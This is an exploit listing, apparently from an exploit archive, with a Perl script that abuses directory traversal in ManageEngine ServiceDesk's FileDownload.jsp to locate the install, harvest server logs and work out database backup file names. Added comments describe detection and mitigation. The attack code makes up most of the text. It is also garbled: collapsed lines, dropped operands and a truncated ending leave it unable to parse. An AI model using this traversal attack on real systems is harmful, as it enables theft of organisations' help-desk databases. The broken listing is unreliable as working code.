# Exploit Title: ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure
# Google Dork: none
# Date: 07.07.2011
# Author: @ygoltsev
# Software Link: http://www.manageengine.com/
# Version: <=8.0.0.12
# Tested on: Windows
# CVE : None
#!/usr/bin/perl
#
# Overview (from the code below): every request is a plain GET to
# /workorder/FileDownload.jsp with module=agent, path=./, delete=false and a
# FILENAME value that starts with a long run of "..\" segments, i.e. a
# directory traversal through the download handler's FILENAME parameter.
# No login or session step appears in the visible code, which suggests the
# endpoint answered without authentication -- confirm against the vendor
# advisory.
#
# Stages: (1) guess the install directory by requesting known product files,
# (2) pull serverout0..10.txt from server\default\log and mine them for the
# build number and BACKUPDIR entries, (3) derive backup file names from the
# logged timestamps and list them in db_backups.html.
#
# Detection: web access logs with requests to /workorder/FileDownload.jsp
# whose FILENAME contains "..\" sequences (probably percent-encoded on the
# wire -- verify in your own logs); a short burst asking for serverout0.txt
# through serverout10.txt corresponds to stage 2.
# Mitigation: the page names only the affected range (<= 8.0.0.12) and no
# fixed build, so take the fixed version from the vendor. The script's own
# message implies backups are only reachable when they sit on the same drive
# as the installation.
#
# NOTE(review): this listing was damaged in extraction (collapsed lines, stray
# spaces inside string literals, dropped "<...>" operands, truncated tail).
# It is reproduced as found and does not parse as shown.
use LWP::UserAgent;
use File::stat;

# Banner text printed at start-up.
$ptxt=" ################################################# # _____ _ ____ _ #| __|___ ___ _ _|_|___ ___| \ ___ ___| |_ #|__ | -_| _| | | | _| -_| | | -_|_ -| '_| #|_____|___|_| \_/|_|___|___|____/|___|___|_,_| # ################################################# [0-day] [Database disclosure] [desc: Exploit for ServiceDesk v *.* OS: Windows] ";
print $ptxt;

# Shared user agent and target; the target is hard-coded to loopback.
$ua=LWP::UserAgent->new();
$url="http://127.0.0.1";
$path="/workorder/FileDownload.jsp";

# Stage 1: locate the install directory; stop if nothing matched.
$installPath=&getInstallPathWin($url,$path);
if ($installPath ne "") {
    # Stage 2: harvest server logs for backup directory / build information.
    @backups=&getServerOutLogs($url,$path,$installPath);
} else {
    print "Install path not found :(\n";
    exit();
}

# Stage 3: record one entry per candidate backup file.
if (scalar(@backups)>0) {
    print "hehe.. We got paths to backup files..\n If they are on the same drive and exists - we will own their world!!\n";
    foreach $backLine (@backups) {
        @backInfo=split(/ --- /,$backLine);
        #print "Trying to download $backInfo[1] from $backInfo[0]...\n";
        &downloadBackups($url,$path,$backLine);
    }
}
# Remove the baseline response file written by getServerOutLogs.
unlink("bad");
print "Dude, check out \'db_backups.html\'\n";

# downloadBackups($url, $path, $backLine)
#   $backLine is a "directory --- filename" pair as produced by
#   getServerOutLogs. Builds the traversal URL for that file in $backupUrl,
#   but the actual fetch is commented out, so $backupUrl is unused in the
#   visible code; the sub only appends $backInfo[1] to db_backups.html.
#   NOTE(review): the string written to the file looks like it lost markup
#   during extraction -- presumably it was a link built from $backupUrl.
sub downloadBackups {
    my ($url,$path,$backLine) = @_;
    @backInfo=split(/ --- /,$backLine);
    $backupUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\ ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ ..\\..\\..\\..\\$backInfo[0]$backInfo[1]";
    #$br=$ua->get($backupUrl);
    #if ($br->is_success) {
    # open(A,">$backInfo[1]");
    # print A $br->content;
    # close(A);
    #}
    open(A,">>db_backups.html");
    print A "$backInfo[1]
\n";
    close(A);
}

# getServerOutLogs($url, $path, $installPath)
#   Requests a log name that is not expected to exist
#   (serverout11111111111<i>.txt; $i is not yet set here) and saves the body
#   as "bad" to serve as a size baseline. Then requests serverout0.txt ..
#   serverout10.txt under <installPath>server\default\log and keeps only the
#   responses whose size differs from the baseline.
#   Each kept log is scanned for a "Build number" line (first value wins, in
#   $sdBuild) and for [SYSOUT] lines carrying BACKUPDIR=, from which a backup
#   file name is assembled out of the logged date and time fields.
#   The operator is then asked to retype each directory without the drive
#   letter; the return value is a list of "dir --- file" strings, one for the
#   "database" name and one with "database" replaced by "fullbackup".
#   Defender takeaway: the server log exposes both the backup directory and
#   the build number, and the backup file name is fully derivable from them
#   plus the timestamp.
sub getServerOutLogs {
    my ($url,$path,$installPath) = @_;
    $badUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\ \..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ \..\\..\\..\\${installPath}server\\default\\log\\serverout11111111111${i}.tx t";
    $br=$ua->get($badUrl);
    if ($br->is_success) {
        open(A,">bad");
        print A $br->content;
        close(A);
    }
    for ($i=0;$i<=10;$i++) {
        $logUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\ \..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ \..\\..\\..\\${installPath}server\\default\\log\\serverout${i}.txt";
        $br=$ua->get($logUrl);
        if ($br->is_success) {
            open(A,">${i}.txt");
            print A $br->content;
            close(A);
            # Same size as the baseline means "file not there": discard it.
            if (stat("bad")->size!=stat("${i}.txt")->size) {
            } else {
                unlink("${i}.txt");
            }
        }
    }
    for ($i=0;$i<=10;$i++) {
        if (-e "${i}.txt") {
            open(A,"${i}.txt");
            @log=;
            close(A);
            foreach $line (@log) {
                if ($line=~/: Build number(.*): ([0-9]+)\|/) {
                    $tBuild=$2;
                    if ($sdBuild eq "") {
                        $sdBuild=$tBuild;
                    }
                }
                # Captures 1-4 are the bracketed time fields, 5-7 the date
                # fields, 9 the BACKUPDIR value; XBUILDX is filled in later.
                if ($line=~/\[([0-9]+):([0-9]+):([0-9]+):([0-9]+)\]\|\[([0-9]+)-([0-9]+)-([0-9] +)\]\|\[SYSOUT\](.*)BACKUPDIR=(.*), ATTACHMENT=/) {
                    push(@backups,"$9 --- backup_servicedesk_XBUILDX_database_${5}_${6}_${7}_${1}_${2}.data");
                }
            }
            unlink("${i}.txt");
        }
    }
    if (scalar(@backups)>0) {
        print "Man, you are realy lucky! We found some info about ServiceDesk backups..\nBUT, I need your help now, hehe\nLet's construct directories!\np.s. type without drive letter, like \\backup\\\n";
    } else {
        print "Bad luck.. Check your karma, seriously..Where is my fucking latte!?!?\np.s. 
No info about backups was found :(";
        exit();
    }
    foreach $mb (@backups) {
        $mb=~s/XBUILDX/$sdBuild/gi;
        @dir=split(/ --- /,$mb);
        print "Trash Dir: $dir[0]\n";
        print "Right Dir: ";
        chomp($rDir=);
        if ($rDir ne "") {
            $fullDB=$dir[1];
            $fullDB=~s/database/fullbackup/gi;
            push(@backupFiles,"$rDir --- $dir[1]");
            push(@backupFiles,"$rDir --- $fullDB");
        }
    }
    return @backupFiles;
}

# getInstallPathWin($url, $path)
#   For each candidate install directory in @paths, requests each name in
#   @checkFiles through the traversal URL and saves successful responses to
#   local files named "<i><k>". The first check name is a random-looking
#   string, presumably a not-found baseline for the later size comparison
#   against $incorrectSize -- the code that sets it is not visible.
#   NOTE(review): the remainder of this sub is garbled and cut off by the
#   extraction; the surviving fragments count size mismatches in $ok and
#   print a confidence message, setting $ret to the matching entry of @paths.
sub getInstallPathWin {
    my ($url,$path) = @_;
    $url1="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\. .\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\. .\\..\\..\\";
    @paths=("ServiceDesk\\","ManageEngine\\ServiceDesk\\");
    @checkFiles=("dashgjifyq8412348fhsjfghjqw.txt","COPYRIGHT","logs\\configport .txt","bin\\run.bat","server\\default\\log\\boot.log");
    $i=0;
    foreach $p (@paths) {
        $k=0;
        foreach $f (@checkFiles) {
            $checkUrl="${url1}${p}${f}";
            $br=$ua->get($checkUrl);
            if ($br->is_success) {
                open(A,">${i}${k}");
                print A $br->content;
                close(A);
            }
            $k++;
        }
        $i++;
    }
    for ($i=0;$isize;
    } else {
        if (stat("${i}${k}")->size!=$incorrectSize) {
            $ok++;
        }
    }
    }
    }
    if ($ok>0) {
        if ($ok==4) {
            print "You are lucky! \nServiceDesk installed to: $paths[$i]\n";
            $ret=$paths[$i];
        } elsif ($ok>2) {
            print "I think ServiceDesk installed to: $paths[$i]\n";
            $ret=$paths[$i];
        } elsif ($ok>1) {
            print "You are lucky if ServiceDesk installed to: $paths[$i]\n";
            $ret=$paths[$i];
        }
    }
    }
    for ($i=0;$i